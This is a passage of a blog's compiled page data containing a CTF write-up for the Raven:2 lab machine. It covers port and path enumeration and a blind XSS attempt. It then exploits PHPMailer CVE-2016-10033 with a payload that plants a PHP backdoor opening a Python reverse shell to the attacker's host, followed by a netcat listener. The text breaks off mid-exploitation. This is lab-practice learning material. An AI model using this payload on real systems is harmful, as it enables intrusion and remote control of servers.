{"componentChunkName":"component---src-templates-blog-post-js","path":"/blog/raven:2-writeup/","result":{"data":{"site":{"siteMetadata":{"title":"nnfewl's Blog","author":"nnfewl"}},"mdx":{"id":"fdf9db4d-6617-5900-9a01-9144129bcb86","excerpt":"This writeup is for my OCSP preparation journey since I always fail to recollect technical details of those CTF boxes I have played, thus, I decided to make a…","body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n  \"title\": \"Raven:2 Writeup\",\n  \"date\": \"2020-07-08T00:00:00.000Z\"\n};\n\nvar makeShortcode = function makeShortcode(name) {\n  return function MDXDefaultShortcode(props) {\n    console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n    return mdx(\"div\", props);\n  };\n};\n\nvar layoutProps = {\n  _frontmatter: _frontmatter\n};\nvar MDXLayout = 
\"wrapper\";\nreturn function MDXContent(_ref) {\n  var components = _ref.components,\n      props = _objectWithoutProperties(_ref, [\"components\"]);\n\n  return mdx(MDXLayout, _extends({}, layoutProps, props, {\n    components: components,\n    mdxType: \"MDXLayout\"\n  }), mdx(\"p\", null, \"This writeup is for my OCSP preparation journey since I always fail to recollect technical details of those CTF boxes I have played, thus, I decided to make a note of my dumb approach to harden my memory on this sort of skill.\"), mdx(\"h2\", null, \"Initial contact\"), mdx(\"p\", null, \"First thing first, import target ip address into environment variables:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \"export\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token assign-left variable\"\n  }), \"IP\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"192.168\"), \".2.188\"))), mdx(\"p\", null, \"Scanning target open port, identify relative service.\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ nmap -sV -sC -oA nmap/raven \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token variable\"\n  
}), \"$IP\")))), mdx(\"p\", null, \"Result:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"Nmap scan report:\\nHost is up \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0\"), \".000046s latency\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \".\\nNot shown: \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"997\"), \" closed ports\\nPORT    STATE SERVICE VERSION\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"22\"), \"/tcp  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"open\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"ssh\"), \"     OpenSSH \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"6\"), \".7p1 Debian \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"5\"), \"+deb8u4 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"protocol \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2.0\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n 
 }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \" ssh-hostkey:\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"   \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1024\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"26\"), \":81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"DSA\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"   \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2048\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"31\"), \":58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"RSA\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"   \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"256\"), \" 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"ECDSA\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n  
  \"className\": \"token operator\"\n  }), \"|\"), \"_  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"256\"), \" 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"ED25519\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"80\"), \"/tcp  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"open\"), \"  http    Apache httpd \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2.4\"), \".10 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token variable\"\n  }), mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"((\"), \"Debian\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"))\")), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"_http-server-header: Apache/2.4.10 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"Debian\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"_http-title: Raven Security\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"111\"), \"/tcp \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": 
\"token function\"\n  }), \"open\"), \"  rpcbind \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2\"), \"-4 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"RPC \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"#100000)\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \" rpcinfo:\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"   program version   port/proto  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"service\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"   \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"100000\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2,3\"), \",4        \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"111\"), \"/tcp  rpcbind\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"   \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"100000\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2,3\"), \",4        \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"111\"), \"/udp  rpcbind\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"   \", mdx(\"span\", 
_extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"100024\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), \"          \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"34782\"), \"/tcp  status\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \"_  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"100024\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), \"          \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"49203\"), \"/udp  status\\nMAC Address: 08:00:27:3D:1F:5D \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"Oracle VirtualBox virtual NIC\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\nService Info: OS: Linux\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\"), \" CPE: cpe:/o:linux:linux_kernel\"))), mdx(\"p\", null, \"Now that I know target machine had port 22, 80, 111 opened, so typical attack path in my mind is through web application.\"), mdx(\"p\", null, \"So I open my browser and head to \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"http://192.168.2.188/\"\n  }), \"http://192.168.2.188/\"), \", there\\u2019s a website; I then use cursor to hover each link element to quickly go through every endpoint, and write them down into my Cherrytree notebook.\"), mdx(\"p\", null, \"Then I have an endpoint list like this:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    
\"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"http://192.168.2.188/\\nhttp://192.168.2.188/about.html\\nhttp://192.168.2.188/wordpress/\\nhttp://192.168.2.188/wordpress/wp-login.php\\nhttp://192.168.2.188/contact.php\"))), mdx(\"p\", null, \"After this, visit each endpoint one by one. I quickly noticed that several resources didn\\u2019t load up normally, use \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"u\"), \" to view source code to find out that it using url \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"raven.local/img/\"), \" to fetch resources like image, css file, etc, since \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"raven.local\"), \" did not have any reasonable address to point to, that why several endpoint behave abnormal. Anyway, I spotted first key informaton to proceed next move. 
Add this domain name to my \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/etc/hosts\"), \" file, and set it to point to \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"192.168.2.188\"), \".\"), mdx(\"p\", null, \"Now, give my previous endpoint list a quick update:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"http://raven.local/\\nhttp://raven.local/about.html\\nhttp://raven.local/wordpress/\\nhttp://raven.local/wordpress/wp-login.php\\nhttp://raven.local/contact.php\"))), mdx(\"p\", null, \"At this point, besides knowing that this website is built with WordPress and has a WordPress admin login endpoint at \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"http://raven.local/wordpress/wp-login.php\"), \", I don\\u2019t really have any option other than to keep enumerating.\"), mdx(\"p\", null, \"Use gobuster to do a path enumeration:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ gobuster \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"dir\"), \" -u http://raven.local/ -w /usr/share/dirbuster/\"))), mdx(\"p\", null, \"While gobuster was running, I tested two input forms, the \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/contact.php\"), \" 
\\u201Ccontact us\\u201D fields and \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/wordpress\"), \" blog \\u201Ccomment\\u201D fields, trying to pull off a blind XSS attack in the hope of obtaining some admin cookies or credentials. There was no response.\"), mdx(\"h4\", null, \"Get flag1\"), mdx(\"p\", null, \"Heading back to the terminal to check the gobuster result, it turns out a new path \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"vendor\"), \" was spotted. Visiting \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"http://raven.local/vendor/\"), \" in the browser shows that it\\u2019s a PHPMailer source repository; it is browsable only because the vendor directory sits inside the web root. After sifting through a couple of files, I successfully captured the first flag. There are two interesting files: the first one is CHANGELOG.md, and the second one is SECURITY.md. After close scrutiny, I found out that the version number of this PHPMailer is 5.2.17 and that it\\u2019s vulnerable to CVE-2016-10033 RCE.\"), mdx(\"p\", null, \"Use searchsploit to query existing exploits:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ searchsploit PHPMailer\"))), mdx(\"p\", null, \"Result:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": 
\"gatsby-resp-image-link\",\n    \"href\": \"/static/b0b7e2b6edba1b087c41980bcca94162/75609/raven-101944.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"result\",\n    \"title\": \"result\",\n    \"src\": \"/static/b0b7e2b6edba1b087c41980bcca94162/fcda8/raven-101944.png\",\n    \"srcSet\": [\"/static/b0b7e2b6edba1b087c41980bcca94162/12f09/raven-101944.png 148w\", \"/static/b0b7e2b6edba1b087c41980bcca94162/e4a3f/raven-101944.png 295w\", \"/static/b0b7e2b6edba1b087c41980bcca94162/fcda8/raven-101944.png 590w\", \"/static/b0b7e2b6edba1b087c41980bcca94162/efc66/raven-101944.png 885w\", \"/static/b0b7e2b6edba1b087c41980bcca94162/75609/raven-101944.png 994w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"It gives out several exploits, copy them into my current folder:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", 
_extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ searchexploit -m php/webapps/40974.py\"))), mdx(\"p\", null, \"First of all, \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"cat 40974.py\"), \" to have a overall grasp about the exploits.\"), mdx(\"p\", null, \"There is a couple of place need to change for our exploitation:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"python\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-python\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-python\"\n  }), \"target \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'http://192.168.2.188/contact.php'\"), \"\\nbackdoor \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'/hello.php'\"), \"\\n\\npayload \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'<?php system(\\\\'python -c \\\"\\\"\\\"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\\\\\\\'192.168.2.187\\\\\\\\\\\\',443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\\\\\\\\\\"/bin/sh\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"-i\\\\\\\\\\\\\\\"])\\\"\\\"\\\"\\\\'); ?>'\")))), mdx(\"p\", null, \"In a nutshell, all this exploit will do is create a backdoor php script named \", 
mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"hello.php\"), \" under \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/var/www/html/\"), \", which can be accessed through \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"http://raven.local/hello.php\"\n  }), \"http://raven.local/hello.php\"), \". So each time a request hits \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"hello.php\"), \", it will launch a reverse shell connect back to a specific ip address. As you can see, payload default configuration is \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"192.168.2.187\"), \", I gonna change it to my kali machine\\u2019s ip address which is \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"192.168.2.56\"), \".\"), mdx(\"p\", null, \"Set a netcat receiver before executing this exploit and waiting for connection:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"nc\"), \" -lvnp \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"433\")))), mdx(\"p\", null, \"Before execution, this script does have two dependencies to install, better use python venv to separate it from default python.\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n 
   \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ python3 -m venv pwn\"))), mdx(\"p\", null, \"This will create a folder named \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"pwn\"), \", and it will contain a copy of your machine\\u2019s python environment. When it\\u2019s activated, and I can install whatever dependency I encountered, it will not pollute my default python environment.\"), mdx(\"p\", null, \"With that being said, activate this virtual environment:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \"source\"), \" pwn/bin/activate\"))), mdx(\"p\", null, \"Install dependency:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ python3 -m pip \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"install\"), \" requests_toolbelt lxml\"))), mdx(\"p\", null, \"Code:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", 
_extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/350de/raven-111939.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"code\",\n    \"title\": \"code\",\n    \"src\": \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/fcda8/raven-111939.png\",\n    \"srcSet\": [\"/static/d863d6bf76a35b89ff4e18d0c71ec10b/12f09/raven-111939.png 148w\", \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/e4a3f/raven-111939.png 295w\", \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/fcda8/raven-111939.png 590w\", \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/efc66/raven-111939.png 885w\", \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/350de/raven-111939.png 998w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"The last prompt will print only if that last get request to \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"target + backdoor\"), \" which stands for \", 
mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"http://raven.local/ + hello.php\"), \" had an HTTP status code equals to 200.\"), mdx(\"p\", null, \"Now, procced to detonate this exploit:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ python3 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"40974\"), \".py\"))), mdx(\"p\", null, \"Exploitation prompt:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), 